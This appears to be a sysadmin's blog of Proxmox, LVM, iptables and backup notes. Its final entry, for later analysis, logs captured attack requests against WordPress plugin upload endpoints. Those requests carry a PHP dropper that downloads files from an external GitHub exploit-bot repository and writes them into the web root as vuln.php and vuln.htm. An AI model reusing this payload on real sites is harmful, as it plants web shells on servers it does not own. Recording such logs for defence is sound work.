Wednesday, July 3, 2019

Add an SSD disk to Proxmox as LVM-thin

Add a 480 GB SanDisk SSD

fdisk /dev/sdd
n  new primary partition
t  set the partition type to 8e (Linux LVM)

pvcreate --metadatasize 250k -y -ff /dev/sdd1
vgcreate ssd480 /dev/sdd1
create the logical volume and convert it to a thin pool
lvcreate -L 420G -n lvm-ssd480 ssd480
lvconvert --type thin-pool ssd480/lvm-ssd480
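The pool can also be created in a single step; a minimal sketch, assuming the same VG and pool names as above, with a quick check afterwards:

lvcreate --type thin-pool -L 420G -n lvm-ssd480 ssd480   # create the thin pool directly
lvs -a ssd480                                            # verify the pool and its hidden data/metadata volumes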


root@ies:~# more /etc/pve/storage.cfg

lvmthin: localssd480
        thinpool lvm-ssd480
        vgname ssd480
        content images,rootdir
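The same entry could also be added from the CLI instead of editing storage.cfg by hand; a sketch, assuming the names used above:

pvesm add lvmthin localssd480 --vgname ssd480 --thinpool lvm-ssd480 --content images,rootdir
pvesm status   # the new storage should now show up as active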


root@ies:~# pvesm status
Name                   Type     Status           Total            Used       Available        %
local                   dir     active        98559220        80857492        12652180   82.04%
local-2t            lvmthin     active      1887436800       619456757      1267980042   32.82%
local-lvm           lvmthin     active       850669568       126579631       724089936   14.88%
local-ssdlvm        lvmthin   inactive               0               0               0    0.00%
localssd480         lvmthin     active       440401920               0       440401920    0.00%
maquetacio-rafa        cifs     active      1786248964      1022766164       763482800   57.26%
nas-dlink               nfs     active      3840539008      3817249152        23289856   99.39%
root@ies:~#
root@ies:~#
root@ies:~# pvesm scan lvm
vmdata
pve
ssd480
root@ies:~# pvesm lvmthinscan ssd480
lvm-ssd480
root@ies:~# pvesm lvmthinscan pve
data
root@ies:~# pvesm lvmthinscan vmdata
vmstore


root@ies:~# pvesm list local-lvm
local-lvm:vm-104-disk-1   raw 21474836480 104
local-lvm:vm-106-disk-1   raw 4294967296 106
local-lvm:vm-116-disk-1   raw 4294967296 116
local-lvm:vm-118-disk-1   raw 4294967296 118
local-lvm:vm-120-disk-1   raw 8589934592 120
local-lvm:vm-211-disk-1   raw 34359738368 211
local-lvm:vm-330-disk-1   raw 68719476736 330
local-lvm:vm-330-disk-2   raw 68719476736 330
local-lvm:vm-510-disk-1   raw 8589934592 510
local-lvm:vm-550-disk-0   raw 34359738368 550
local-lvm:vm-609-disk-0   raw 8589934592 609
local-lvm:vm-719-disk-0   raw 30064771072 719
local-lvm:vm-721-disk-0   raw 8589934592 721
local-lvm:vm-741-disk-0   raw 8589934592 741

Thursday, October 25, 2018

Firewall rule limited to a specific time window

iptables -I FORWARD 1 -p tcp --sport 53 -d 10.1.1.0/22 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p tcp --sport 53 -d 10.1.23.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p udp --sport 53 -d 10.1.1.0/22  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p udp --sport 53 -d 10.1.23.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p tcp --sport 53 -d 10.1.6.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1  -p udp --sport 53 -d 10.1.6.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT

iptables -I FORWARD 1 -s 10.1.1.0/22 -p tcp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.23.0/24 -p tcp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.1.0/22 -p udp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.23.0/24  -p udp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.6.0/24 -p tcp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.6.0/24 -p udp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT


Rules so that on Fridays from 18:30 to 21:30 DNS requests can be made to the root DNS servers or any other external resolver.
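To confirm the rules really sit at the top of the FORWARD chain and are matching traffic during that window, a quick check:

iptables -L FORWARD -n -v --line-numbers | head -20   # rules inserted with '-I FORWARD 1' appear first; the counters show matches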

Tuesday, October 2, 2018

ies kernel: audit: type=1400 audit(1538480598.585:12): apparmor="DENIED" operation="mount" info="failed mntpnt match" error=-13 profile="/usr/bin/lxc-start" name="/" pid=2180 comm="lxc-start" flags="rw, rslave"

Proxmox error after upgrading: the LXC containers won't start

pct start 400

AVC apparmor="DENIED" operation="mount" info="failed mntpnt match" error=-13 profile="/usr/bin/lxc-start" name="/" pid=2180 comm="lxc-start" flags="rw, rslave"

Oct 02 13:43:18 ies kernel: audit: type=1400 audit(1538480598.585:12): apparmor="DENIED" operation="mount" info="failed mntpnt match" error=-13 profile="/usr/bin/lxc-start" name="/" pid=2180 comm="lxc-start" flags="rw, rslave"

After following a few links about this error, this one worked for me:


https://forum.proxmox.com/threads/apparmor-preventing-lxcs-starting-after-update.42060/

I needed to manually add
deb http://download.proxmox.com/debian/pve stretch pve-no-subscription then run apt-get full-upgrade (and update, of course) to fix it. I am writing this as a heads-up to all other people who have the same problem and as a sort of bug report.
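Concretely, on the Proxmox host that amounts to something like this (a sketch, assuming a PVE 5.x / Debian stretch install without a subscription; the sources file name is just a convention):

echo "deb http://download.proxmox.com/debian/pve stretch pve-no-subscription" > /etc/apt/sources.list.d/pve-no-subscription.list
apt-get update
apt-get full-upgrade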
 
 
Yes, now I can start the container.


And a member of the staff confirms that adding this repository is correct:

if you don't have a subscription, you need to enable the no-subscription repository like described in the docs. otherwise, you don't get updates, and thus also no bug and security fixes.
 

Friday, September 28, 2018

List of the day's backups

root@hp350:/mnt/backup/dump# ls -lt|egrep 'Sep 28'|awk '{ print $9}'
vzdump-lxc-700-2018_09_28-03_15_20.log
vzdump-lxc-700-2018_09_28-03_15_20.tar.lzo
vzdump-qemu-515-2018_09_28-03_12_21.log
vzdump-qemu-515-2018_09_28-03_12_21.vma.lzo
vzdump-qemu-510-2018_09_28-03_11_35.log
vzdump-qemu-510-2018_09_28-03_11_35.vma.lzo
vzdump-qemu-504-2018_09_28-03_10_17.log
vzdump-qemu-504-2018_09_28-03_10_17.vma.lzo
vzdump-qemu-503-2018_09_28-03_09_34.log
vzdump-qemu-503-2018_09_28-03_09_34.vma.lzo
vzdump-qemu-502-2018_09_28-03_07_29.log
vzdump-qemu-502-2018_09_28-03_07_29.vma.lzo
vzdump-lxc-405-2018_09_28-03_03_06.log
vzdump-lxc-405-2018_09_28-03_03_06.tar.lzo
vzdump-lxc-404-2018_09_28-02_51_44.log
vzdump-lxc-404-2018_09_28-02_51_44.tar.lzo
vzdump-lxc-120-2018_09_28-02_50_44.log
vzdump-lxc-120-2018_09_28-02_50_44.tar.lzo
vzdump-lxc-118-2018_09_28-02_49_33.log
vzdump-lxc-118-2018_09_28-02_49_33.tar.lzo
vzdump-lxc-116-2018_09_28-02_48_27.log
vzdump-lxc-116-2018_09_28-02_48_27.tar.lzo
vzdump-lxc-108-2018_09_28-02_38_40.log
vzdump-lxc-108-2018_09_28-02_38_40.tar.lzo
vzdump-lxc-106-2018_09_28-02_36_29.log
vzdump-lxc-106-2018_09_28-02_36_29.tar.lzo
vzdump-lxc-104-2018_09_28-02_31_23.log
vzdump-lxc-104-2018_09_28-02_31_23.tar.lzo
vzdump-lxc-101-2018_09_28-02_30_02.log
vzdump-lxc-101-2018_09_28-02_30_02.tar.lzo

root@hp350:/mnt/backup/dump# ls -lt|egrep 'Sep 28'|awk '{ print $9}'|grep tar.lzo
vzdump-lxc-700-2018_09_28-03_15_20.tar.lzo
vzdump-lxc-405-2018_09_28-03_03_06.tar.lzo
vzdump-lxc-404-2018_09_28-02_51_44.tar.lzo
vzdump-lxc-120-2018_09_28-02_50_44.tar.lzo
vzdump-lxc-118-2018_09_28-02_49_33.tar.lzo
vzdump-lxc-116-2018_09_28-02_48_27.tar.lzo
vzdump-lxc-108-2018_09_28-02_38_40.tar.lzo
vzdump-lxc-106-2018_09_28-02_36_29.tar.lzo
vzdump-lxc-104-2018_09_28-02_31_23.tar.lzo
vzdump-lxc-101-2018_09_28-02_30_02.tar.lzo

Until I fine-tune it, the copy is:
rsync vzdump*2018_10_05* -A ies@192.168. :/mnt/usb
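A sketch of what the finished command might look like, in archive mode with ACLs preserved; the target host here is a placeholder (the real IP is redacted above):

rsync -avA --progress vzdump*2018_10_05* ies@192.168.0.100:/mnt/usb/   # 192.168.0.100 is a hypothetical address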


Thursday, September 27, 2018

WARNING: Sum of all thin volume sizes (932.00 GiB) exceeds the size of thin pool pve/data and the size of whole volume group (931.26 GiB)!

While migrating machines between two Proxmox hosts, I run into this warning message during one of the restores.

WARNING: Sum of all thin volume sizes (932.00 GiB) exceeds the size of thin pool pve/data and the size of whole volume group (931.26 GiB)!

I had been cheerfully moving machines across, but now I find I have run out of space?
The sum of the allocated sizes comes out above the limit I actually have.

root@ies:~# lvscan
 ACTIVE            '/dev/pve/swap' [8.00 GiB] inherit
 ACTIVE            '/dev/pve/root' [96.00 GiB] inherit
 ACTIVE            '/dev/pve/data' [811.26 GiB] inherit
 ACTIVE            '/dev/pve/vm-330-disk-1' [64.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-330-disk-2' [64.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-403-disk-1' [100.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-402-disk-1' [108.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-108-disk-1' [21.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-118-disk-1' [4.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-116-disk-1' [4.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-120-disk-1' [16.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-104-disk-1' [20.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-101-disk-1' [13.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-106-disk-1' [4.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-400-disk-1' [208.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-206-disk-1' [202.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-510-disk-1' [8.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-520-disk-1' [32.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-502-disk-1' [32.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-211-disk-1' [32.00 GiB] inherit

Adding up all the sizes gives:

64 + 64 + 100 + 108 + 21 + 4 + 4 + 16 + 20 + 13 + 4 + 208 + 202 + 8 + 32 + 32 + 32 = 932 GiB
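The same total can be pulled straight out of LVM instead of adding the sizes by hand; a sketch, assuming the pve volume group:

lvs --noheadings --units g -o lv_name,lv_size pve | awk '/vm-/ {gsub("g","",$2); sum+=$2} END {print sum " GiB"}'   # sums only the vm-* thin volumes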

Let me look at machine 400:
root@ies:~# pct enter 400
root@moodle:~# df -h
Filesystem                                          Size  Used Avail Use% Mounted on
/dev/mapper/pve-vm--400--disk--1  204G  144G   50G  75% /

where I can see 50 GB still free. Can I shrink the disk size from Proxmox?

Searching on Google I find:

I tried with "pct resize 106 rootfs 80gb" (from 200gb)

But I get: "unable to shrink disk size"

In fact, the Proxmox web UI rejects negative values for shrinking.

IN THE END I GO FOR THE SLOWER OPTION: MAKE A BACKUP AND RESTORE IT WITH A SMALLER SIZE. The images involved only need to stay powered on and should not grow any more, since they are kept for consultation only.

You probably figured it out already, but that seems to be a limitation of LXC containers, at least for now. From the pct man page :
  \+?\d+(\.\d+)?[KMGT]?
       The new size. With the + sign the value is added to the actual size of the volume and without it,
       the value is taken as an absolute one. Shrinking disk size is not supported.
If you truly want to shrink a container, I guess you'd have to perform a backup, then restore it with the --rootfs local:<new_size> option, like so:
pct stop <ctid>
vzdump <ctid> -storage local -compress lzo
pct destroy <ctid>
pct restore <ctid> /var/lib/lxc/vzdump-lxc-<ctid>-....tar.lzo --rootfs local:<new_size>

So far this has worked to shrink the disks and recover at least 100 GB across 4 machines.

Of course, you can't perform this sort of resizing online, so I wouldn't call it a great solution, but it works if you have no other choice.
Good luck,
 
https://serverfault.com/questions/784890/how-to-shrink-the-disk-of-a-lxc-container-on-proxmox-4
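Put together, a worked sketch of that backup-and-restore shrink for one of these containers; 400 is used as an illustrative CTID, local-lvm:100 as the new 100 GB rootfs, and the archive name is just an example:

pct stop 400
vzdump 400 -storage local -compress lzo
pct destroy 400
pct restore 400 /var/lib/vz/dump/vzdump-lxc-400-2018_09_27-12_00_00.tar.lzo --rootfs local-lvm:100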

Tuesday, September 25, 2018

Proxmox error: Unable to create new inotify object: Too many open files at /usr/share/perl5/PVE/INotify.pm line 390.

I can't create any more machines with the container-creation script.

Unable to create new inotify object: Too many open files at /usr/share/perl5/PVE/INotify.pm line 390.

Do you have lots of containers running? Then you probably ran into the inotify limits:
These are the defaults:
Code:
# sysctl fs.inotify
fs.inotify.max_queued_events = 16384
fs.inotify.max_user_instances = 128
fs.inotify.max_user_watches = 65536
Try increasing the instance limit, eg. # sysctl fs.inotify.max_user_instances=512

Done.
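To make the higher limit survive a reboot, a minimal sketch (the file name is just a convention):

echo "fs.inotify.max_user_instances = 512" > /etc/sysctl.d/90-inotify.conf
sysctl --system   # reload all sysctl configuration files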

root@proxmox-alumnes3:~# ./script-creacion-lxc-idnoigualip.sh 298-299
hola, tot sembla correcte - el nom del grup serà: 298-299
298
43
  Using default stripesize 64.00 KiB.
  Logical volume "vm-298-disk-1" created.
mke2fs 1.43.4 (31-Jan-2017)
Discarding device blocks: done
Creating filesystem with 2097152 4k blocks and 524288 inodes
Filesystem UUID: 06b5b002-1d79-4ccc-bd15-7fab5872182b
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Allocating group tables: done
Writing inode tables: done
Creating journal (16384 blocks): done
Multiple mount protection is enabled with update interval 5 seconds.
Writing superblocks and filesystem accounting information: done

extracting archive '/var/lib/vz/template/cache/deb9-ssh.tar.gz'
Total bytes read: 569384960 (544MiB, 52MiB/s)
Detected container architecture: amd64
Creating SSH host key 'ssh_host_rsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_dsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ecdsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ed25519_key' - this may take some time ...
Tue Sep 25 23:57:42 CEST 2018 :: es crea la maquina : 298
299
44
  Using default stripesize 64.00 KiB.
  Logical volume "vm-299-disk-1" created.
mke2fs 1.43.4 (31-Jan-2017)
Discarding device blocks: done
Creating filesystem with 2097152 4k blocks and 524288 inodes
Filesystem UUID: e4e1866e-7299-4518-93ee-01aac8259fde
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Allocating group tables: done
Writing inode tables: done
Creating journal (16384 blocks): done
Multiple mount protection is enabled with update interval 5 seconds.
Writing superblocks and filesystem accounting information: done

extracting archive '/var/lib/vz/template/cache/deb9-ssh.tar.gz'
Total bytes read: 569384960 (544MiB, 105MiB/s)
Detected container architecture: amd64
Creating SSH host key 'ssh_host_dsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_rsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ecdsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ed25519_key' - this may take some time ...

Tue Sep 25 23:58:17 CEST 2018 :: es crea la maquina : 299

Saturday, September 22, 2018

Requests flagged by Maltrail as potential PHP injection

A request arriving at the server; I have replaced the server's domain name with URL-DOMINI. Since it goes looking for wp-admin, it is most likely an attack targeting WordPress.

I suppose they are probing for some kind of vulnerability, but I have only uploaded the content here to analyze it at some other time.


URL-DOMINI/wp-admin/admin-ajax.php (POST --02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22action%22nm_personalizedproduct_upload_file--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22name%22upload.php--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now!
$im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploite), URL-DOMINI/wp-admin/admin-ajax.php?action=getcountryuser&cs=2 (POST --fb3e771fb1bc46fd8574153def3e543cContent-Disposition: form-data; name=%22popimg%22; filename=%22settings_auto.php%22Vuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;@unlink(__FIL), URL-DOMINI/wp-admin/admin-post.php (POST --73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22page%22pagelines--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22settings_upload%22settings--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22Vuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = ), URL-DOMINI/wp-content/plugins/barclaycart/uploadify/uploadify.php (POST --6919b300ff3848a9aa59b607a4054b2dContent-Disposition: form-data; name=%22Filedata%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now! 
$im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   echo %22n), URL-DOMINI/wp-content/plugins/cherry-plugin/admin/import-export/upload.php (POST --0b046a619cbb41288861f394d4dbb9cbContent-Disposition: form-data; name=%22file%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   ec)